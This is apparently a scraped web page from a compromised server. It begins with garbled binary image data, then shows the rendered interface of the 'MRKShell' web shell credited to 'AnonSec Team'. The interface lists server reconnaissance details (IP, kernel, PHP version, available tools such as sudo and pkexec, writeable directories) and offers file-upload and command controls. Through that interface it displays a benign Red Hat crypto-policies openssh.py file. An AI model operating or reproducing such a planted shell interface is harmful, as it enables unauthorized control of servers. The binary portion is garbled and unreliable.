JFIF # -$)%7&).0444#9?92>-240 5+#+4;224;652252222225222220222522225222522;2225222222"B!1AQa"q2B#R3br5CS/!12AQ"aRq#3 ??;}q7:bd%Ո>L8/$rsrQٷf=+e: Rb0Z6pN۰7b 1S`JAT K,-֥7(bNRb9CsD/s,9?}+KA]`,EΞ@@ 3ukq14""tD@D@D@D@D@D@D@D@D@D@D@ȓ|:^Yw-)G%AI/9pwVSнm@6=g7AA5tg18gj>F'J,{C3(q<*#AzX?[$va:Q4SԽ7Uԥ&,c}nF;3mO$DN}RySm\*I"}b%7GLj;gp{{FYs(p_xOJFtStǸMU蓰s95"#H'Uq>7F5[}>v%'Y,&CqMzn}m*Xo vl˳hrӦ V)))g`7$sz^%I-1leE]y%݉>?f}( *BNNñ𜤢S[i'T1 ӥԊ>NlHď~)pKw1.UsD LI/k]Sr\r=ߴMAZNKi+P}| qBS*G*z:Imk\_|l6A7߉H\z0賈'Zt_\u>4 {\#O[ERxzLvP wOLT C0ȴ]BAʷ7uNNINS,(DDDDDDDL8MY݂N$ dMK׭i2FesmNQ=?omKv]OVl^@&pɴ[t5+E`oy.E]Ϳ}$g(7y7&X+imcT\(cHɤ|=. C =yȗXʧpv=&cX*[X_i4 GtfFՓnbMjR@ thv4LO I0zlU-_*G!cH9`nԿ \k-~rS*c[}9]qbi~+%)(h($ s;dՒG_\ё[Q,plq!pEſA RZU0*\n]a~Md_3EZ { &8e:jR*dAkyۛs\B˞0Z5%6e`3;0slSx+Xȇ"*ozkE"vܬWاQ8r @ m5$ [/KNFycgrۑ@ {""""""|xd*@s7o~7BSG|܎vøGtЍL١ѬnK/, f~^~l/Ij+!JI'^;{˚*hӤJarʮ)ڱ[P^$;%.V FLJW̔?2ԭUpJe,~b%iW Yhz̻FAl|3ln"M4kM@$2wmͣp8JY)ݬ.]3vԩİ(P*Tb/1FXTg KŮ*C9jE[69d!GZȩMu!5`H\Cp"=wSAmJjCn&/*Q[kQ~b"zΕ~)aA(2EZ0(FÑp.66_φk}T5 YdRarK ɽLSj"SnR-N-Mz~F^Igb Jq(~X fH'Ӵp5_HN(ܰ,Ȍ䶛DK%a~?FuI}"p=U+j}'p&I_ɑ-x!IٮM:w|q;9M?.6x:ODѪ̬zTL`t^?8xJ$ Q cL4d/_xy ˔ SPGNgwSrrS/`5ӧKj ,hTpI=LѦ(,Pc4*4iESO?5sMz<`&_bsTO)fkX[ xqq::h9ifVۉ\_R }JVg~Jzm`(]:O &6IOghX6+HM 7X]RkUr{HL-"< >~28b{[><@6gF5&\1̹nVŕonZM7 (SF$l\sM];owE+IֹȫzɲDߌPcMQMG)b,N ;*!uo&rHT`s^7įĴz0?P&Ҫ3]@H:hڢFҢM~p{&0s?k}+Ι9׵mw >?"fs+Odٯ̌m(R9T:UpbkW=F*ZQh urk8C8@ҧeUԀyKS '.UP,NBcpFS6n=AJl*7 4<(XY_Cda/D=()b,{yHL>[jrǹ7#M7fO`o/w]GȈEU2f\?7a)#봙݂͠SEg>VRdPfF@PV"Ꮷ_(qCJG_0?1[% NKu$7&ۭ ߡ26U$`/ 3ES:/nek |\tmSg5 س}6/qDT "(*sP4SrX)%T(6y%_ Z9<%]B}oyyY"]76*U*vjijw i3D̍IS \Jnn9ۋ>%o;~)5u56槡'z* B5#5

5#a`,>1TW{Xɘ}G4"ҕ4z5F>e6*[\;%*U0LUUr2cpnݢkɜY͌3+bG0#el۴oe,,jO*M1X/3z)W^,p>s{ İQs:ޝd|w :fIe$~+ajXjnT80'S>KIUP&kNϒT=XlȞNڞ]Yz_K[Qׂގ\gq!nB@IoG *l;_뼳\RUeэkm)qh傢5KNz٘6ba:671k{  $N vfN]S7gxg=VjG;wBx t~l/"ʭl=ԝ6n[Dٛ]@"x)# E):\8Bvkcpv4O*;coJ?4ªMCA'.\zVð'w1USݻSlTyj/ gʕ,:S')ܴ]7!A^b%P׶ٮհU3 o\}XTp,e 597n}dk6UFrVǧ3qaR:BWn>Ѻ}oxKӦK)kܑKL tCs1#?升 v{r:u)?#ZxM=ڝYـ#e}JHBGTG>GsܞG2+~R̅Hש)$[*Hfx-ugx({ I7λwvYm~ |e'X#db@hW,0H8*J5AъA`;jȊY*&sh8Jn]"M>l3z%Րsy=Um'qF sX %,Uv|0W`Gzcy*V0'3R`5ޓ Hڙ>PWbw7;)[U(:krm>/ QU+)P>Hm!r -evY>wT7ԝe)^6_SN⚓ϫ('?2Sj5,[پd|+_Pv'[]t'mΝ2l}z/dz^E|"'J qED)R2ƂSg`9Ոu5~ d!G%>M6%pdcP-P L`ϼTQnA_,24G GneRn,XnߕSzV$ReBfZuE ,Z(yi?vO!clOYA [; c I|vCom+Hꡤ\eaӴ;XS|v4%FcϷAQ[yϢ_s+Ơ&pt}=%^Sb"#gĀ'[ oAUPzr;ȔZTy4t>f種ً>T؟GRgC^-WЖukS,G LV$ܱO餰%cp)[*X_v$@DDӢ3bE-V0֍?zySyadd\ j5": Bxi?;3a]1]ZFD澙rc|8uz/ CȎ3UTqb4'ҥX 6KʖYT2fPe$6 lGzSQTP} OL1q^*rxջQ_K?'?=V MR K IS HERE

MRKShell
Server IP : 172.67.193.120  /  Your IP : 172.71.28.167
Web Server : nginx/1.14.1
System : Linux comtuc2-s-2vcpu-8gb-160gb-intel-nyc3 4.18.0-348.7.1.el8_5.x86_64 #1 SMP Wed Dec 22 13:25:12 UTC 2021 x86_64
User : nginx ( 991)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/crypto-policies/python/policygenerators/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : /usr/share/crypto-policies/python/policygenerators/openssh.py
# SPDX-License-Identifier: LGPL-2.1-or-later

# Copyright (c) 2019 Red Hat, Inc.
# Copyright (c) 2019 Tomáš Mráz <tmraz@fedoraproject.org>

from subprocess import call, CalledProcessError
from tempfile import mkstemp

import os

from .configgenerator import ConfigGenerator


class OpenSSHGenerator(ConfigGenerator):
	_FORMAT_STRING = ''

	cipher_map = {
		'AES-256-GCM':'aes256-gcm@openssh.com',
		'AES-256-CTR':'aes256-ctr',
		'AES-192-GCM':'',  # not supported
		'AES-192-CTR':'aes192-ctr',
		'AES-128-GCM':'aes128-gcm@openssh.com',
		'AES-128-CTR':'aes128-ctr',
		'CHACHA20-POLY1305':'chacha20-poly1305@openssh.com',
		'CAMELLIA-256-GCM':'',
		'AES-256-CCM':'',
		'AES-192-CCM':'',
		'AES-128-CCM':'',
		'CAMELLIA-128-GCM':'',
		'AES-256-CBC':'aes256-cbc',
		'AES-192-CBC':'aes192-cbc',
		'AES-128-CBC':'aes128-cbc',
		'CAMELLIA-256-CBC':'',
		'CAMELLIA-128-CBC':'',
		'RC4-128':'',
		'DES-CBC':'',
		'CAMELLIA-128-CTS':'',
		'3DES-CBC':'3des-cbc'
	}

	mac_map_etm = {
		'HMAC-MD5':'hmac-md5-etm@openssh.com',
		'UMAC-64':'umac-64-etm@openssh.com',
		'UMAC-128':'umac-128-etm@openssh.com',
		'HMAC-SHA1':'hmac-sha1-etm@openssh.com',
		'HMAC-SHA2-256':'hmac-sha2-256-etm@openssh.com',
		'HMAC-SHA2-512':'hmac-sha2-512-etm@openssh.com'
	}

	mac_map = {
		'HMAC-MD5':'hmac-md5',
		'UMAC-64':'umac-64@openssh.com',
		'UMAC-128':'umac-128@openssh.com',
		'HMAC-SHA1':'hmac-sha1',
		'HMAC-SHA2-256':'hmac-sha2-256',
		'HMAC-SHA2-512':'hmac-sha2-512'
	}

	kx_map = {
		'ECDHE-SECP521R1-SHA2-512':'ecdh-sha2-nistp521',
		'ECDHE-SECP384R1-SHA2-384':'ecdh-sha2-nistp384',
		'ECDHE-SECP256R1-SHA2-256':'ecdh-sha2-nistp256',
		'ECDHE-X25519-SHA2-256':'curve25519-sha256,curve25519-sha256@libssh.org',
		'DHE-FFDHE-1024-SHA1':'diffie-hellman-group1-sha1',
		'DHE-FFDHE-2048-SHA1':'diffie-hellman-group14-sha1',
		'DHE-FFDHE-2048-SHA2-256':'diffie-hellman-group14-sha256',
		'DHE-FFDHE-4096-SHA2-512':'diffie-hellman-group16-sha512',
		'DHE-FFDHE-8192-SHA2-512':'diffie-hellman-group18-sha512',
	}

	gx_map = {
		'DHE-SHA1':'diffie-hellman-group-exchange-sha1',
		'DHE-SHA2-256':'diffie-hellman-group-exchange-sha256',
	}

	gss_kx_map = {
		'DHE-GSS-SHA1':'gss-gex-sha1-',
		'DHE-GSS-FFDHE-1024-SHA1':'gss-group1-sha1-',
		'DHE-GSS-FFDHE-2048-SHA1':'gss-group14-sha1-',
		'DHE-GSS-FFDHE-2048-SHA2-256':'gss-group14-sha256-',
		'ECDHE-GSS-SECP256R1-SHA2-256':'gss-nistp256-sha256-',
		'ECDHE-GSS-X25519-SHA2-256':'gss-curve25519-sha256-',
		'DHE-GSS-FFDHE-4096-SHA2-512':'gss-group16-sha512-',
	}

	sign_map = {
		'RSA-SHA1':'ssh-rsa',
		'DSA-SHA1':'ssh-dss',
		'RSA-SHA2-256':'rsa-sha2-256',
		'RSA-SHA2-512':'rsa-sha2-512',
		'ECDSA-SHA2-256':'ecdsa-sha2-nistp256',
		'ECDSA-SHA2-384':'ecdsa-sha2-nistp384',
		'ECDSA-SHA2-512':'ecdsa-sha2-nistp521',
		'EDDSA-ED25519':'ssh-ed25519',
	}

	sign_map_certs = {
		'RSA-SHA1':'ssh-rsa-cert-v01@openssh.com',
		'DSA-SHA1':'ssh-dss-cert-v01@openssh.com',
		'RSA-SHA2-256':'rsa-sha2-256-cert-v01@openssh.com',
		'RSA-SHA2-512':'rsa-sha2-512-cert-v01@openssh.com',
		'ECDSA-SHA2-256':'ecdsa-sha2-nistp256-cert-v01@openssh.com',
		'ECDSA-SHA2-384':'ecdsa-sha2-nistp384-cert-v01@openssh.com',
		'ECDSA-SHA2-512':'ecdsa-sha2-nistp521-cert-v01@openssh.com',
		'EDDSA-ED25519':'ssh-ed25519-cert-v01@openssh.com',
	}

	@classmethod
	def generate_options(cls, policy, local_kx_map, local_gss_kx_map, do_host_key):
		p = policy.enabled
		cfg = ''
		sep = ','

		s = ''
		for i in p['cipher']:
			try:
				s = cls.append(s, cls.cipher_map[i], sep)
			except KeyError:
				pass

		if s:
			cfg += cls._FORMAT_STRING.format('Ciphers', s)

		s = ''
		if policy.integers['ssh_etm']:
			for i in p['mac']:
				try:
					s = cls.append(s, cls.mac_map_etm[i], sep)
				except KeyError:
					pass
		for i in p['mac']:
			try:
				s = cls.append(s, cls.mac_map[i], sep)
			except KeyError:
				pass

		if s:
			cfg += cls._FORMAT_STRING.format('MACs', s)

		s = ''
		gss = ''
		for kx in p['key_exchange']:
			for h in p['hash']:
				if policy.integers['arbitrary_dh_groups']:
					try:
						val = cls.gx_map[kx + '-' + h]
						s = cls.append(s, val, sep)
					except KeyError:
						pass
					try:
						val = local_gss_kx_map[kx + '-' + h]
						gss = cls.append(gss, val, sep)
					except KeyError:
						pass
				for g in p['group']:
					try:
						val = local_kx_map[kx + '-' + g + '-' + h]
						s = cls.append(s, val, sep)
					except KeyError:
						pass
					try:
						val = local_gss_kx_map[kx + '-' + g + '-' + h]
						gss = cls.append(gss, val, sep)
					except KeyError:
						pass

		if gss:
			cfg += cls._FORMAT_STRING.format('GSSAPIKexAlgorithms', gss)
		else:
			cfg += cls._FORMAT_STRING.format('GSSAPIKeyExchange', 'no')

		if s:
			cfg += cls._FORMAT_STRING.format('KexAlgorithms', s)

		s = ''
		for i in p['sign']:
			try:
				s = cls.append(s, cls.sign_map[i], sep)
			except KeyError:
				pass
			if policy.integers['ssh_certs'] == 1:
				try:
					s = cls.append(s, cls.sign_map_certs[i], sep)
				except KeyError:
					pass

		if s:
			# As OpenSSH currently ignores existing known host
			# entries with this setting we cannot use it on client.
			# Otherwise we could break existing users.
			if do_host_key:
				cfg += cls._FORMAT_STRING.format('HostKeyAlgorithms', s)
			cfg += cls._FORMAT_STRING.format('PubkeyAcceptedKeyTypes', s)

		s = ''
		for i in p['sign']:
			try:
				s = cls.append(s, cls.sign_map[i], sep)
			except KeyError:
				pass

		if s:
			cfg += cls._FORMAT_STRING.format('CASignatureAlgorithms', s)

		return cfg


class OpenSSHClientGenerator(OpenSSHGenerator):
	CONFIG_NAME = 'openssh'
	SCOPES = {'ssh', 'openssh', 'openssh-client'}

	_FORMAT_STRING = '{0} {1}\n'

	@classmethod
	def generate_config(cls, policy):
		local_kx_map = dict(cls.kx_map)
		local_gss_kx_map = dict(cls.gss_kx_map)

		return cls.generate_options(policy, local_kx_map, local_gss_kx_map, False)

	@classmethod
	def test_config(cls, config):
		if not os.access('/usr/bin/ssh', os.X_OK):
			return True

		fd, path = mkstemp()

		ret = 255
		try:
			with os.fdopen(fd, 'w') as f:
				f.write(config)
			try:
				ret = call('/usr/bin/ssh -G -F ' + path +
					' bogus654_server >/dev/null',
					shell=True)
			except CalledProcessError:
				cls.eprint("/usr/bin/ssh: Execution failed")
		finally:
			os.unlink(path)

		if ret:
			cls.eprint("There is an error in OpenSSH generated policy")
			cls.eprint("Policy:\n%s" % config)
			return False
		return True


class OpenSSHServerGenerator(OpenSSHGenerator):
	CONFIG_NAME = 'opensshserver'
	SCOPES = {'ssh', 'openssh', 'openssh-server'}

	# We need restart here, since systemd needs to pick up new command line options
	RELOAD_CMD = 'systemctl try-restart sshd.service 2>/dev/null || :\n'

	_FORMAT_STRING = '-o{0}={1} '

	@classmethod
	def generate_config(cls, policy):
		# Difference from client, keep group1 disabled on server
		local_kx_map = dict(cls.kx_map)
		local_gss_kx_map = dict(cls.gss_kx_map)
		del local_kx_map['DHE-FFDHE-1024-SHA1']
		del local_gss_kx_map['DHE-GSS-FFDHE-1024-SHA1']

		cfg = cls.generate_options(policy, local_kx_map, local_gss_kx_map, True)
		cfg = cfg.rstrip()
		return 'CRYPTO_POLICY=\'' + cfg + '\''

	@classmethod
	def _test_setup(cls):
		_fd, path = mkstemp()
		os.unlink(path)
		ret = 255
		try:
			ret = call('/usr/bin/ssh-keygen -t rsa -b 2048 -f ' + path +
				' -N "" >/dev/null',
				shell=True)
		except CalledProcessError:
			cls.eprint("/usr/bin/ssh-keygen: Execution failed")

		if ret:
			cls.eprint("SSH Keygen failed when testing OpenSSH server policy")
			return ''
		return path

	@classmethod
	def _test_cleanup(cls, path):
		if path:
			os.unlink(path)

	@classmethod
	def test_config(cls, config):
		if not os.access('/usr/sbin/sshd', os.X_OK):
			return True

		host_key_filename = cls._test_setup()
		if not host_key_filename:
			return False

		fd, path = mkstemp()

		ret = 255
		try:
			with os.fdopen(fd, 'w') as f:
				f.write(config)
			try:
				ret = call('/usr/bin/bash -c \'source ' + path +
					' && /usr/sbin/sshd -T $CRYPTO_POLICY -h ' +
					host_key_filename +
					' -f /dev/null\' >/dev/null',
					shell=True)
			except CalledProcessError:
				cls.eprint("/usr/sbin/sshd: Execution failed")
		finally:
			os.unlink(path)
			cls._test_cleanup(host_key_filename)

		if ret:
			cls.eprint("There is an error in OpenSSH server generated policy")
			cls.eprint("Policy:\n%s" % config)
			return False
		return True

Anon7 - 2022
AnonSec Team